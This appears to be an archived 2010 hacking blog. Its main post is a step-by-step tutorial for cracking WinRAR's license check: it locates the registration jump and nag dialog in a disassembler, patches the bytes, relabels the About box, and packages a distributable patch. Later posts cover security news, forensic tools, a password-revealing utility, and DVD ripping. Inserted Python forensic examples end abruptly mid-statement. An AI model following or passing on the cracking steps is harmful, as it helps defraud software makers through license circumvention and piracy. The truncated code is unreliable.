
Sunday, January 31, 2010

Learn to Crack any version of WinRAR – An Introduction to cracking

Hi folks, it's been a long time since I have posted something technical, so I will be writing about the challenge I got at NIT KU, where I cracked WinRAR 3.80 using a disassembler, and I will tell you the same here. You can crack any version of WinRAR using this method and need not pay the registration fee, and you can do this all by yourself, easily. Furthermore, major software is cracked in the same way; the methodology just gets a bit more complex. This tutorial is intended for those who are new to cracking and disassembling.

Disclaimer – By reading this tutorial you agree that this tutorial is intended for educational purposes only and the author cannot be held liable for any kind of damages done whatsoever to your machine, or damages caused by some other, creative application of this tutorial.
In case you disagree with the above statement, stop here.
The Tools
To perform this hack you will need -
  1. Any disassembler (I use Hackers Disassembler and Hview)
  2. Resource Hacker
  3. A patch creator (use Universal Patch Creator or Code Fusion)
You will be able to get them by googling.

How to Crack?
You need to have a bit of knowledge of assembly language, and in case you don't have it, just cram the steps and it will work anytime, every time. Download the latest version of WinRAR from their website and install it.
I will be cracking WinRAR 3.80 here (cuz I already have it :P). This is basically a 2-step process (4 steps, if you want to do things with a professional touch).
[Screenshot: Install WinRAR]
Now copy the WinRAR.exe file to the desktop. Make a copy of it there.

Step 1 – Hunting for Memory Address
Now open Hackers Disassembler and load the copy in it.

[Screenshot: Open Hackers Disassembler and load the copy of WinRAR in it]

The disassembler will disassemble the executable into assembly code. Now you need to search for strings that are used in the WinRAR program. Press Ctrl + F, type “evaluation” without quotes, and search in the assembly code. Hit Enter.

[Screenshot: Reach this block of code using the search function]

After you have reached this block of code by searching, just look at the block of code above it. There you will find that some values are being compared and then the code jumps to some other function. Now look carefully: the “evaluation copy” function must be invoked after some specific condition is met. We need to look for it in the code and then make certain changes to the condition so that the program doesn't check for the condition.

[Screenshot: We need to edit this code, but first note the memory address]
In the above code you can see this code -
00444B6A: 803DF4B84B0000 cmp byte ptr [004BB8F4], 00
00444B71: 0F859B000000 JNE 00444C12
This is the code responsible for validating you as a legal user :). Just note down the memory address of the jump (JNE) to some memory location. In this case, note down 00444B71.
Note: For any WinRAR version, this code and memory address might be different, but the JNE will be the same. Just note down the respective memory address that checks.
Now you need to search for the code that brings up that ugly nag screen “Please purchase WinRAR license” after your trial period of 40 days is over. For this, look over your toolbar and click on “D”, which stands for looking for dialog references.
[Screenshot: Hit the D in the toolbar]

Now in the dialog box that opens, search for “please” and you will get the reference as -
ID-REMINDER, “Please purchase WinRAR license”
[Screenshot: Search in dialog references]

Double click on it and you will reach the subsequent code.

[Screenshot: Note down the location of the REMINDER dialog code]
The code will be something like
* String: “REMINDER”
0048731A: 68EB5E4B00 push 004B5EEB
Just note the memory address that invokes the REMINDER dialog. In this case it's 0048731A. Note it down.
Note: For any WinRAR version, this code and memory address might be different. But the REMINDER memory address code will always PUSH something. Just note down the respective memory address that PUSHes.


Step 2 – Fixing and Patching
Now in this step we will be patching the values at the memory addresses we noted earlier. I will be doing this using HVIEW.
Now load the copy you disassembled in Hackers Disassembler into HVIEW.

[Screenshot: Open HVIEW and open the EXE in it]

After you have loaded it, you will see the code is unreadable. It's just like opening an EXE file in Notepad. You need to decode it. To do that, just press F4 and you will get an option to decode it. Hit DECODE and you will be able to see the code in the form of assembly code and memory addresses.

[Screenshot: Decode the code by pressing F4]

After you have done that, you need to search for the memory addresses you noted down earlier. Just hit F5 and a search box will appear. Now you need to enter the memory address. To do that, enter a “.” and then type the memory address, leaving out the leading “00”. The “.” will suffice for “00”, i.e. -
Type .444B71 in place of 00444B71
[Screenshot: Search using F5]

and search in the code.

[Screenshot: Reach the code]

After you have reached the respective code, you need to make changes to it. Press F3 and you will be able to edit the code. Now make the following changes -

[Screenshot: Change the values]

After you have done it, save it by pressing F9.
Now search for the next memory location by pressing F5 and entering it. Reach there and make the following changes by pressing F3 -

[Screenshot: Offset patching]

Save the changes by pressing F9 and exit HVIEW by pressing F10.
Congrats.. You have cracked WinRAR :) Replace the original WinRAR.exe with this copyofwinrar.exe by renaming it. It will work 100% fine :P

Step 3 – Spicing up the EXE
Now that you have a 100% working version of the EXE, you might want to change your registration information in WinRAR. To do this, you can use Resource Hacker.

[Screenshot: We need to change registration info]

Launch Resource Hacker and load copyofwinrar.exe in it.

[Screenshot: Use Resource Hacker and open the file]

Now go to DIALOG –> Expand tree –> ABOUTRARDLG and click it. Now find the Trial copy line and replace it with your favorite one :P

[Screenshot: Make changes and compile them]

and click on the Compile Script button.

[Screenshot: Yup.. that's the final result]

Now save the file with any name on your desktop or any location whatsoever.

[Screenshot: Save your EXE]

Now you have a fully patched WinRAR.exe file :)) You can either use it, or you can also distribute it like a real cracker. If you want to learn that, move on to the next step.

Step 4 – Creating a working Patch (or giving Professional touch :P )
I will be using diablo2oo2's Universal Patcher (UPE) for creating the patch. The patch will work like any authentic one for that WinRAR version. Just like the one you downloaded at any time of your life from any crack and keygen website.
Launch Patch Creator and click on add new project. Enter the project information and click on save.

[Screenshot: Launch the patcher and set it up]

Click on Add –> Offset patch

[Screenshot: Create Offset patch]

After you have done that, double click on offset patch and then
  1. Give path of original winrar.exe
  2. Give path of unmodified Winrar.exe (again)
  3. Give path for fully patched Winrar.exe (i.e. Cracked Winrar.exe in this case)
  4. Click on compare and it will show the difference between both files
  5. Click on save.
[Screenshot: Compare executables]
Now in the next window, click on Create Patch and save it. The patch will be created. Now copy it into the WinRAR installation directory and hit patch; it WILL work.

[Screenshot: Create your patch]

Congrats, you have created a patch of your own and have learned to crack WinRAR :)

[Screenshot: Run the patch and it will work :)]

You can crack other software in the same way… just practice, debug and disassemble and you will get the way :)
[PS: The above is the long way to do it. I will be telling you the shortest way to crack WinRAR in just 1 step; the main aim of this tutorial was to introduce you to disassemblers and tools, and do some dirty work with your hands.]
Cheers
XERO

PS : Like this article ? You can always support me by buying me a coffee or You can always try some of the cool merchandize from PROHACK.
 
POSTED BY XERO ALL RIGHTS RESERVED.


Tuesday, January 26, 2010

Security hole in Gmail used by Chinese hackers was created by U.S. law enforcement

China states that it was not involved in the attacks on Google and other Silicon Valley corporations. They have even gone as far as to defend their regime of censorship and firewalling! The "accusation that the Chinese government participated in (any) cyberattack, either in an explicit or inexplicit way, is groundless and aims to denigrate China," a spokesman from the Chinese Ministry of Industry and Information Technology told the Xinhua Chinese news agency.

If China isn't behind these sophisticated, masterful attacks... who -- or what -- is?

In further news, there's a brilliant (but very opinionated) piece over on CNN by Bruce Schneier. The hackers used a backdoor in Gmail to gain access -- a backdoor required by U.S. law enforcement agencies. It's not uncommon for such rear entries to exist -- they started to appear in Western nations around the same time as anti-terrorism laws -- but the fact that such backdoors are easy to hack is a concern.

Basically, all major online services have such backdoors programmed into them. It's not crazy to assume that similar attacks were used on the other 30 Silicon Valley businesses. It's not such a problem that these backdoors exist -- it's a problem that once in place, someone will discover them -- they will be hacked.

Schneier finishes his CNN Opinion piece with a poignant and chilling thought about the current state of technology and the things to come:

"The problem is that such control makes us all less safe. Whether the eavesdroppers are the good guys or the bad guys, these systems put us all at greater risk. Communications systems that have no inherent eavesdropping capabilities are more secure than systems with those capabilities built in. And it's bad civic hygiene to build technologies that could someday be used to facilitate a police state."

SOURCE: Download Squad

Monday, January 25, 2010

Income Tax Server Hacked: Rs11 crore was siphoned off

At least Rs11 crore of refunds were discovered to have been stolen last week by hacking into the password of some assessing officers who are responsible for crediting the refunds. The refunds were credited to fake accounts for which the returns had been filed electronically.

"We have stopped the payment and have been able to prevent at least two cases. Also investigation and action has been initiated by the Directorate of Income Tax (Investigation), Mumbai to detect the bank accounts to which the refunds had been credited and the beneficiaries," the finance ministry said.

All high value refunds issued during the current financial year will be checked again. "The system of handling high value refunds will be replaced with a more robust and foolproof system," the finance ministry said.

Income tax refunds could get delayed, said an official. Refunds in 2009-10 have doubled from the last year at Rs 12,421 crore as many refunds were deferred. It was Rs 6,899 crore the previous fiscal.

The investigators have identified the bank accounts, beneficiaries and some of those involved in the scam, the finance ministry claimed.

Central Bureau of Investigation and the Mumbai police are looking for the beneficiaries.

SOURCE: Indiatimes

Sunday, January 24, 2010

China paper slams US for cyber role in Iran unrest

China's Communist Party mouthpiece on Sunday accused the United States of mounting a cyber army and a "hacker brigade", and of exploiting social media like Twitter or Youtube to foment unrest in Iran.

The People's Daily accused the United States of controlling the Internet in the name of Internet freedom after Secretary of State Hillary Clinton called for more Internet freedoms in China and elsewhere in a speech on Thursday.

China on Friday warned that Washington's push against Internet censorship could harm ties.

"Behind what America calls free speech is naked political scheming. How did the unrest after the Iranian elections come about?" said the editorial, signed by Wang Xiaoyang.
"It was because online warfare launched by America, via Youtube video and Twitter microblogging, spread rumours, created splits, stirred up, and sowed discord between the followers of conservative reformist factions."

China has blocked Youtube since March, the anniversary of uprisings in Tibet, and Twitter since June, just before the 20th anniversary of a crackdown on protestors in and near Tiananmen Square. Facebook has been down since early July.

The People's Daily asked rhetorically if obscene information or activities promoting terrorism would be allowed on the Internet in the U.S.

"We're afraid that in the eyes of American politicians, only information controlled by America is free information, only news acknowledged by America is free news, only speech approved by America is free speech, and only information flow that suits American interests is free information flow," it said.

Clinton's speech came shortly after Google revealed a sophisticated hacking attack, and said it might close its google.cn Chinese search engine if it could not find a way to offer a legal, unfiltered search service in China.

"Everyone with technical knowledge of computers knows that just because a hacker used an IP address in China, the attack was not necessarily launched by a Chinese hacker," Zhou Yonglin, deputy operations director of the National Computer Network Emergency Response Technical Team, said in an interview carried in a number of Chinese newspapers on Sunday.

Zhou mentioned an outage suffered by Chinese search engine Baidu on Jan. 12 but did not mention that it was attacked by the Iranian Cyber Army, which had previously attacked Twitter, nor that Chinese hackers launched retaliatory attacks on Iranian sites the next day.

The People's Daily also denounced a May ban on Microsoft's instant messaging services to nations covered by U.S. sanctions, including Cuba, Iran, Syria, Sudan and North Korea, as violating the U.S. stated desire for free information flow.

SOURCE: Reuters

Recycle Bin Forensic Analysis Tool: RIFIUTI

Many important files within Microsoft Windows have structures that are undocumented. One of the principles of computer forensics is that all analysis methodologies must be well documented and repeatable, and they must have an acceptable margin of error. Currently, there is a lack of open source methods and tools that forensic analysts can rely upon to examine the data found in proprietary Microsoft files.

Many computer crime investigations require the reconstruction of a subject's Recycle Bin. Since this analysis technique is executed regularly, we researched the structure of the data found in the Recycle Bin repository files (INFO2 files). Rifiuti, the Italian word meaning "trash", was developed to examine the contents of the INFO2 file in the Recycle Bin. The foundation of Rifiuti's examination methodology is presented in the white paper located here. Rifiuti will parse the information in an INFO2 file and output the results in a field delimited manner so that it may be imported into your favorite spreadsheet program. Rifiuti is built to work on multiple platforms and will execute on Windows (through Cygwin), Mac OS X, Linux, and *BSD platforms.

Usage: rifiuti [options]
-t Field Delimiter (TAB by default)

Example Usage:

[kjones:rifiuti/rifiuti_20030410_1/bin] kjones% ./rifiuti INFO2 > INFO2.txt

Open INFO2.txt as a TAB delimited file in MS Excel to further sort and filter your results
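
Added example (not Rifiuti's code and not part of the original post): a minimal Python parser for the Windows 2000/XP INFO2 layout as it is commonly documented, producing the same kind of field-delimited output. The layout constants (20-byte header with the record size at offset 12, fixed-size records), the function names and the sample bytes are assumptions constructed for illustration.

```python
import struct
from datetime import datetime, timedelta, timezone

HEADER_SIZE = 20      # file header; the DWORD at offset 12 holds the record size
ANSI_LEN = 260        # MAX_PATH-sized ANSI path that starts every record
UNICODE_OFF = 280     # UTF-16LE path follows the fixed fields (800-byte records)
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_utc(ft):
    """A FILETIME counts 100 ns ticks since 1601-01-01 UTC."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def parse_info2(data):
    """Return (records, leftover_bytes) for the raw bytes of an INFO2 file."""
    if len(data) < HEADER_SIZE:
        raise ValueError("file shorter than the INFO2 header")
    (rec_size,) = struct.unpack_from("<I", data, 12)
    if rec_size not in (280, 800):          # 280 = ANSI only, 800 = ANSI + Unicode
        raise ValueError("unexpected record size %d" % rec_size)
    body = len(data) - HEADER_SIZE
    leftover = body % rec_size              # partial record, e.g. a truncated carve
    records = []
    for off in range(HEADER_SIZE, HEADER_SIZE + body - leftover, rec_size):
        rec = data[off:off + rec_size]
        # Fixed fields after the ANSI path: index, drive number, FILETIME, size.
        index, drive, ft, size = struct.unpack_from("<IIQI", rec, ANSI_LEN)
        raw = rec[:ANSI_LEN]
        # A zeroed first path byte marks an entry that was restored or purged
        # from the bin; the rest of the path survives and the drive number
        # (0 = A:, 2 = C:) gives the missing letter back.
        gone = raw[0] == 0 and raw[1:3] == b":\\"
        if gone and drive < 26:
            raw = bytes([ord("A") + drive]) + raw[1:]
        ansi = raw.split(b"\x00", 1)[0].decode("cp1252", "replace")
        uni = ""
        if rec_size == 800:
            uni = rec[UNICODE_OFF:].decode("utf-16-le", "replace").split("\x00", 1)[0]
        records.append({
            "index": index,
            "deleted": filetime_to_utc(ft),
            "gone": gone,
            "size": size,
            "ansi_path": ansi,
            "path": uni or ansi,            # prefer the Unicode path when present
        })
    return records, leftover


def to_tsv(records, delimiter="\t"):
    """Field-delimited report, one line per record (TAB by default)."""
    lines = [delimiter.join(["INDEX", "DELETED_UTC", "GONE", "SIZE", "PATH"])]
    for r in records:
        lines.append(delimiter.join([
            str(r["index"]),
            r["deleted"].strftime("%Y-%m-%d %H:%M:%S"),
            "yes" if r["gone"] else "no",
            str(r["size"]),
            r["path"],
        ]))
    return "\n".join(lines)


def build_sample():
    """Constructed two-record INFO2 image for the demo (not real evidence)."""
    def record(path, index, when, size, gone=False):
        ft = int((when - EPOCH_1601).total_seconds()) * 10**7
        ansi = path.encode("cp1252").ljust(ANSI_LEN, b"\x00")
        if gone:
            ansi = b"\x00" + ansi[1:]
        drive = ord(path[0].upper()) - ord("A")
        uni = path.encode("utf-16-le").ljust(520, b"\x00")
        return ansi + struct.pack("<IIQI", index, drive, ft, size) + uni

    # Only the record size (fourth DWORD) is interpreted by parse_info2.
    header = struct.pack("<IIIII", 5, 0, 0, 800, 0)
    t = datetime(2010, 1, 24, 12, 0, tzinfo=timezone.utc)
    return (header
            + record(r"C:\Documents and Settings\user\Desktop\report.doc", 1, t, 24576)
            + record(r"D:\tmp\notes.txt", 2, t + timedelta(minutes=5), 4096, gone=True)
            + b"\x00" * 37)                 # trailing partial record


if __name__ == "__main__":
    recs, extra = parse_info2(build_sample())
    print(to_tsv(recs))
    print("leftover bytes:", extra)
```
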


SOURCE: http://www.foundstone.com

Learn How to display hidden password editbox fields using SHOWIN: Text behind the asterisks *****

ShoWin displays useful information about windows by dragging a cursor over them.

Perhaps one of the most popular uses of this program is to display hidden password editbox fields (text behind the asterisks *****). This will work in many programs although Microsoft have changed the way things work in some of their applications, most notably MS Office products and Windows 2000. ShoWin will not work in these cases. Neither will it work for password entry boxes on web pages, at least with most web browsers.

Additional features include the ability to enable windows that have been disabled, unhide hidden windows (try the program with the include invisibles option set and see how many windows you have on your desktop that you didn't know about!) and force windows to stay on top or be placed below others.


SOURCE: http://www.foundstone.com

Download free Security audit tool for Windows NT: NTLAST

NTLast is specifically targeted for serious security and IIS administration. Scheduled review of your NT event logs is critical for your network. A server breach can be uncovered by regular system auditing. Identifying and tracking who has gained access to your system, then documenting the details is now made easier with NTLast. This tool is able to quickly report on the status of IIS users, as well as filter out web server logons from console logons.

Key Features
  • Reads saved .evt files - makes it easy to search through your archives
  • Allows you to search before, after, and between dates - again to zoom in on something
  • Filters logons 'From' a certain host - helps you zoom in on suspected intrusions
  • Can save files in a csv format w/ time field formatted for Excel
  • Filters out and distinguishes web log usage - cuts down search time
[Screenshot: Failed logons by user]
[Screenshot: The last ten logon failures by username in condensed mode - SOMEONE GUESSING A PASSWORD]
[Screenshot: IIS activity]



SOURCE: http://www.foundstone.com

Wednesday, January 20, 2010

Compress Videos to smallest size

Okay.. A video is nothing but a sequence of still images representing scenes in motion, shown fast enough that they appear to be moving. Frame rate is the number of still pictures per unit of time of video: the PAL (Europe, Asia, Australia, etc.) and SECAM (France, Russia, parts of Africa etc.) standards specify 25 frame/s, while NTSC (USA, Canada, Japan, etc.) specifies 29.97 frame/s. The minimum frame rate to achieve the illusion of a moving image is about 15 frames per second, or the video will be too jerky and you will be a dead jerk.
TERMINOLOGY 

  • BITRATE/Datarate - The parameter of quality of video. Higher bitrate, greater size and gr8 quality. The reverse is ALSO true!
  • FPS - Nopes.. it's not FIRST PERSON SHOOTER (sorry gamers :P). It's frames per second. Simply changing from 30 fps to 24 fps could result in as much as a 20 percent file size reduction! It's better to choose a slightly lower, 'round-number' frame rate in most cases, such as 24.0 or 25.0.
  • CBR - Constant Bitrate. Variable Bitrate in compression leads to high quality audio/video with less file size.
  • VBR - Variable Bitrate. Variable Bitrate in audio compression leads to less high quality audio as compared to VBR. It's used for streaming purposes.
  • MP1/2/4 or MPEG1/MPEG2/MPEG4 - A video format developed by the Motion Pictures Experts Group, hence the name. MPEG1 was the first in the series, allowing for video playback. MPEG2 allows DVD quality, and MPEG4 aims at streaming internet media and a high compression technique.
  • AVI - Audio Video Interleaved. One of the oldest formats available, it enjoys itself in new incarnations as DIVX and XVID. It's a shell in which other techniques/compression/encoding methods are worked out.
  • High Definition - Very high bitrate media used for home/personal viewing.

FORMATS


Due to the popularization of video, a flurry of video formats has flooded the market. But still the most popular ones remain WMV, AVI, MPEG1/2/4, DIVX, XVID, H.264, FLV, RMV, QUICKTIME and more...
Audio formats include MPEG3, Ogg, AC3, WMA, WAV, RM and many more..
Then comes the DVD and High Definition media, encoded at a much higher bitrate.

TOOLS

The list is long.. and you might not want every one of them :) To get them, just Google the name. They are widely recognized.
WARNING
=======

[VIDEO ENCODERS/DECODERS ARE SYSTEM/MEMORY HOGS !!! SINCE IT'S A VERY INTENSIVE AND TIME CONSUMING PROCESS, YOU MIGHT WANT TO FINISH IT ASAP]
  • NERO - Available like booze and (almost) free. Make it enterprise (if you don't have one already) and use NERO VISION to squeeze it out. Also supports editing.
  • Avid - Professionals use it... nice interface.. but still costly. Supports editing.
  • IMTOO MPEG ENCODER - Terrific performance, supports an exhaustive list of formats. Noobs and newbies, do yourself a favor and just stick to it. It will deliver almost everything you want (except editing).
  • FFDSHOW - A collection of codecs. Use the command line (if you like) to encode videos, or just watch/decode videos using it. It comes free with the K-Lite Mega Codec Pack :)
  • VIRTUAL Dub - Free, fantastic and supports everything. But you might need to brainstorm to use it. Supports editing and a lot of stuff !! Highly recommended for geeks.
  • AC3DEC - Used to decode AC3 audio files. Most DVDs use this audio compression method. Get its GUI program to get the best out of it.
  • FLASKMPEG - Used to rip DVDs.. well, you have plenty of choices out there...

COMPRESSION

"SPEED VS QUALITY"
Compress using any format you want; full frames of even a 10 minute footage will eat up a lot of disk space on your PC. So.. some of the optimisation measures you can take to compress videos -
  • Choose a good codec like DIVX/XVID, MPEG4 or WMV.
  • When aiming for MAXIMUM compression with MINIMUM quality loss, just choosing the compressor is NOT ENOUGH.. tweak bitrates accordingly (lower for low quality and small file size, higher for more quality and LARGE file size).
  • If a larger video is shrunk to 320x240 or a similar size, the quality will be MUCH HIGHER than by simply capturing the same video at 320x240. Shrinking the frame size from, say, 640x480 to 320x240 will often result in about the same picture quality as the original 640x480 video, but the new 320x240 file will probably be much, much smaller.
  • Crop the video to get a small frame size.
  • Use low bitrate audio to get a small size video.
  • USE NO AUDIO for silent tutorials.
  • Frame rate can drastically affect file size.
My settings for Internet publishing/mobile phones (low end net connection) -
  • CODEC - MPEG4
  • VIDEO BITRATE - 128/160 KBPS
  • AUDIO BITRATE (if any) - 32/48/64 KBPS
  • FRAME RATE - 15/24/25/30 FPS (choose your pick :P )
  • VIDEO SIZE - 320 X 240 for internet, 176 X 144 for mobile phones
I use SNAG-IT 8 as my screen capture program.

DVD-RIP



FOR COMPRESSING 4 GB VIDEO MOVIE [Assuming you have .VOB files ready]


Section A for NOOBS


TOOL USED- IMTOO MPEG ENCODER
  1. open IMTOO.
  2. Select Movie File.
  3. Select video size from menu.For DVD quality,choose 720 X 480.
  4. Set Bitrate to 700-900 KBPS.
  5. Set Framerate to 25 FPS.
  6. Set aspect as you wish.
  7. Set Audio Codec to MP3,Audio bitrate to 160 KBPS/192 KBPS
  8.  Set Audio sample rate to 44100 Hz
  9. Hit Encode and leave the PC alone for encoding of file.
Section B for GEEKS OUT THERE :D


TOOL USED - VIRTUAL DUB,AC3DEC,FLASKMPEG
*PLACE ALL .VOB FILES AT SAME FOLDER !
[1]. Open FlaskMPEG to convert the VOB video files: select the video file and choose the type of codec (compressor/decompressor) you want to use; generally that will be DivX. DIVX LOW MOTION is best for almost all movies and for those which have NO ACTION, and Fast-Motion is only good when almost the entire movie is very fast paced, like Terminator 2 or Final Fantasy - Advent Children.. you get the idea.. Set bitrate to 900 KBPS, frame rate to 24/25 KBPS, choose the output location, set process priority to high, hit encode and STAY AWAY FROM YOUR PC !!! After a looooooong time, you will have a single AVI file.
[2]. Put AC3DEC.exe in your VOB file folder, run the command prompt, and type -
ac3dec [FILENAME1.VOB] -allvobs -out [filename2.WAV]
NOTE -
* ac3dec is the name of the application being run -- you can also write "ac3dec.exe", with the identical effect
* FILENAME1 is the name of the first .vob file -- in this case 'vts_01_1'
* FILENAME2 is the name of the .wav file you are going to create -- you chose 'MI3Sound'
* -allvobs means to include all .vob files in the folder sequentially (as a single logical file)
* -out means you want to specify the name and path of the output file
Using the example above you will type this in prompt:
C:\MI3> ac3dec vts_01_1.vob -allvobs -out c:\windows\desktop\MI3.wav
Press Enter and the saving process will begin. After it finishes, close the command prompt. You will have a file named MI3.wav on your desktop (approx 1GB).

[PS: GUI VERSION OWNERS WILL HAVE LESS HASSLE.. BUT AFTER ALL, THIS SECTION IS FOR GEEKS :P]
[3]. Open Virtual Dub and select the movie file. Choose "Direct Stream Copy" from the VIDEO menu.
[4]. Open the audio WAV file which was created by going to the AUDIO menu and choosing "Use WAV file". Select the .wav file. Choose "Full Processing Mode" under the AUDIO menu.
[5]. Then choose "Compressor", choose the MP3 codec, and set audio quality to 160 KBPS for high quality and 192 KBPS for very high quality audio.
[6]. Then set 24.000 or 25.000 FPS from the Frame rate option in the VIDEO menu.
[7]. Choose "FILTERS" in the VIDEO menu and add the filters you want one at a time (if you wish). Configure and use them accordingly.
[8]. Hit encode and in 25 to 50 minutes you will have your rip ready :)

NOTE: You can test how good the compression is so far by compressing the resulting video file into a RAR file. Two cases arise then -
  1. If there is less than 5% compression, the compression is probably about as good as it will get.
  2. If there is more than 5% compression, the audio and/or video can probably be compressed even further. H.264 or XVID/DIVX are your best bets for the smallest file size at any given quality. Just keep in mind that each has various quality settings that affect the compression, and thus the output size. You could use the same program to convert to each, but if the default settings are different, your output file size testing would be skewed.

FINDING SOFTWARE

DVD-ripping software of all kinds can be found at www.divx-digest.com, and www.download.com has all different kinds of programs.


Friday, January 15, 2010

Iranian Cyber War Against Twitter

The image below shows what appeared when Twitter was googled during the compromise. The translation:

“In the name of God, As an Iranian this is a reaction to Twitter’s interference sly which was U.S. authorities ordered in the internal affairs of my country…”

It’s not the first time we see such a standard response from Twitter, but check out this picture from Twitter’s Platform Lead engineer, Alex Payne.



Iranian Cyber Army

THIS SITE HAS BEEN HACKED BY IRANIAN CYBER ARMY


U.S.A. Think They Controlling And Managing Internet By Their Access, But THey Don’t, We Control And Manage Internet By Our Power, So Do Not Try To Stimulation Iranian Peoples To….

NOW WHICH COUNTRY IN EMBARGO LIST? IRAN? USA?
WE PUSH THEM IN EMBARGO LIST
Take Care

The Email address provided gave the media access to the hackers, creating a wider reach for their message.

From the NY Times:

…the writing on the image which is not in English includes a line of Arabic script and the words “Ya Hussein” on the green flag, which is a reference to the prophet Muhammad’s grandson, who is revered in Iran. Further down the screen, there is a poem that says, roughly: ‘We will die if our leader orders us to fight, and if he wants, we will be patient and tolerant.’


SOURCE: www.penn-olson.com

Thursday, January 14, 2010

How Secure Gmail Service Is ???

After Chinese hackers broke into Google's services, Google has tightened up Gmail encryption.

Since 2008 users of Google mail have had the option of using the HTTPS protocol, which encrypts mail as it travels between the web browser and Google's servers.

Writing on the official Google blog, Google said that using HTTPS helps protect data from being snooped on by third parties, such as in public WiFi hotspots.

Initially Google decided to leave the choice of using HTTPS all the time instead of just during user signon to its users because the more secure protocol did slow down traffic.

After researching the matter, Google now thinks that the benefits outweigh the drawbacks and has turned HTTPS on for everyone all the time.

It is rolling out default HTTPS for everyone. If you've previously set your own preference in Gmail Settings to HTTPS, nothing will change for your account. If punters trust the security of their networks and don't want default HTTPS turned on for performance reasons, they can turn it off from the Gmail Settings menu.

World's Largest Annual Hacker Conference, 26C3, Took place in Berlin last week

The 26th edition of the world's largest annual hacker conference, 26C3, took place in Berlin last week. With about 2,500 attendees, a combined total of 9,000 participants worldwide (via live streams), and an array of features that no other conference in the world can match, it was very much a milestone.

A bit on the word "hacker", as I know the term might be bothering some of you. A HACKER: one who tinkers, one who deconstructs out of a natural curiosity about how something works and how it could be made to do something it wasn't originally intended to do. Such abilities are akin to the skilled locksmith, and do not automatically make a hacker a criminal. Unfortunately for many who work in mainstream media, the word has been hijacked to be synonymous with "electronic evildoer". Yet, like many words that have been used to keep minority groups down, hackers are taking the label back.

Announcements such as the GSM encryption crack may have made international headlines last month, but something much more significant is clear: throughout the world, hackers have come out from their bunkers and opened up community spaces. They go by various names (co-working spaces, clubhouses, hideouts, space stations) and are a global-scale breakthrough for a community that for decades has not always been willing or able to go public. By opening up, they've not only gone public, but have also opened their doors to anyone curious or interested in the world of technology and how things work.

This phenomenon may be bigger than it has ever been, but in some corners of the world, it is not altogether new. Groups of German hackers have long organised themselves as officially recognised clubs and taken on challenges of a technical (or non-technical) nature. In North America, the movement has seen its greatest expansion in the past few years, with spaces such as NYC Resistor in Brooklyn, Pumping Station: One in Chicago and Noisebridge in San Francisco providing a creative space for a rapidly growing membership. The hacker space movement includes clubs in different parts of Latin America, as well as in South Africa, Israel, Iran, Dubai, Thailand, Malaysia, Singapore, Indonesia, Japan and Australia. Every month, the list gets longer as more groups come forward and post their details online at hackerspaces.org, a central hub and wiki for all info about spaces, including how to start one.

Among the attendees at the 26C3 conference were the people behind wikileaks, the wiki clearinghouse for leaked documents. In its first few years wikileaks has come under attack by governments and other large institutions who fear its growing influence and has made international headlines on several occasions, including when it was ordered to shut down by a California court in 2008 after documents were leaked related to offshore bank activities. Presenting at this year's congress, their goal was to explain how this project could become an essential tool for journalists throughout the world who seek sources and secure methods to protect the identity of those with access to – and brave enough to leak – sensitive information.

Also present was Bre Pettis and his Makerbot Industries. The knob on your dishwasher broke off? Trying in vain to contact customer assistance and find some way to get a replacement part? Well Pettis had a better idea, and by using a 3D printer, produced his own replacement knob. His tinkering with 3D printing has resulted in the founding of his very own company, Makerbot, which has actual employees and its own manufacturing space in Brooklyn, shipping Makerbots all over the world. Pettis didn't tell us to buy his stuff, but talked about what other people have been building and how he envisages a future where people aren't just consumers: he dreams of a return of the tradition of people making things.

It is hard not to be in awe of what this group of hackers was able to build for a four-day conference: its GSM network, an internal Dect phone system, a radio station, its own all-volunteer first aid and emergency rescue team and an indescribably fast network with capacity that no conference or municipality in the world can compete with. It is no wonder spaces are popping up everywhere, as hackers come out of the cupboards and stand proudly as the talented explorers and critical thinkers that they are.

SOURCE: www.guardian.co.uk

Wednesday, January 13, 2010

Download free Tools to examine NTFS for unauthorized activity: FORENSIC TOOLKIT

The Forensic ToolKit™ contains several Win32 command line tools that can help you examine the files on an NTFS disk partition for unauthorized activity.

Key Features
  • AFind is the only tool that lists files by their last access time without tampering with the data the way that right-clicking on file properties in Explorer will. AFind allows you to search for access times between certain time frames; by coordinating this with logon info provided by ntlast, you can begin to determine user activity even if file logging has not been enabled.
  • HFind scans the disk for hidden files. It will find files that have either the hidden attribute set, or NT's unique and painful way of hiding things by using the directory/system attribute combination. This is the method that IE uses to hide data. HFind lists the last access times.
  • SFind scans the disk for hidden data streams and lists the last access times.
  • FileStat is a quick dump of all file and security attributes. It works on only one file at a time but this is usually sufficient.
  • Hunt is a quick way to see if a server reveals too much info via NULL sessions.
Command Line Switches

afind [dir] /f [filename] /ns=no subs /a after /b before /m between
time format =

hfind [dir] /hd=find dir/system attribs /ns=no subs

sfind [dir] /ns=no subs

filestat [filename]

hunt [\\servername]
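
What AFind's time-window search amounts to, as an added Python example (not Foundstone's tool or code): files are listed by last access time read from metadata only, with optional after/before bounds and a no-subdirectories option mirroring the /a, /b and /ns switches. The directory tree, file names and timestamps in demo() are constructed sample data.

```python
import os
import tempfile
from datetime import datetime, timezone


def list_by_access_time(root, after=None, before=None, recurse=True):
    """Return (atime, path) pairs under root, oldest access first.

    after/before are timezone-aware datetimes; either may be None.
    """
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        if not recurse:
            dirnames[:] = []  # do not descend, like a "no subs" switch
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                # stat() reads metadata only; the file is never opened, so
                # its own last-access time is left exactly as found.
                st = os.stat(path, follow_symlinks=False)
            except OSError:
                continue  # vanished or unreadable: skip, keep sweeping
            atime = datetime.fromtimestamp(st.st_atime, tz=timezone.utc)
            if after is not None and atime < after:
                continue
            if before is not None and atime > before:
                continue
            hits.append((atime, path))
    hits.sort()
    return hits


def utc(year, month, day, hour=0, minute=0):
    return datetime(year, month, day, hour, minute, tzinfo=timezone.utc)


def demo(recurse=True):
    """Build a constructed tree with known access times and query one window."""
    with tempfile.TemporaryDirectory() as root:
        sample = {  # constructed: relative path -> last access time
            "a.txt": utc(2010, 1, 10, 9, 0),
            "b.txt": utc(2010, 1, 12, 23, 30),
            os.path.join("sub", "c.txt"): utc(2010, 1, 13, 2, 15),
        }
        for rel, atime in sample.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write("constructed sample\n")
            os.utime(path, (atime.timestamp(), atime.timestamp()))
        hits = list_by_access_time(
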